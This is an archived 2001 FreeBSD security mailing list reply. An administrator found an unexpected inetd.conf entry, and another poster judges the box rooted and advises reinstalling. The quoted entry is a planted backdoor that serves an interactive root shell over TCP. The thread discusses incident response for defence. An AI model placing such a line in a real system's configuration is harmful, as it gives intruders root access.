Date: Thu, 1 Nov 2001 09:58:23 -0500 (EST) From: Ralph Huntington <rjh@mohawk.net> To: "G.P. de Boer" <g.p.de.boer@st.hanze.nl> Cc: <freebsd-security@freebsd.org> Subject: Re: strange inetd.conf entry Message-ID: <20011101095342.I79615-100000@mohegan.mohawk.net> In-Reply-To: <5.1.0.14.0.20011101154627.01f2e3f0@thedarkside.nl>
next in thread | previous in thread | raw e-mail | index | archive | help
> >I have that sinking feeling. I discovered this line at the end of > >inetd.conf on one of our servers: > > > >dlip stream tcp nowait root /bin/sh sh -i > > > Take the box down, do a reinstall and don't run known exploitable > daemons. The shell acquired using the above line is useable. [snip] > > Hope the box wasn't really doing anything important, because it's rooted > for sure. Thanks for the info, GP. I wonder how they got in to begin with. In any event, it was only doing nameservice and had no sensitive files. We are reloading it today. - Ralph To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20011101095342.I79615-100000>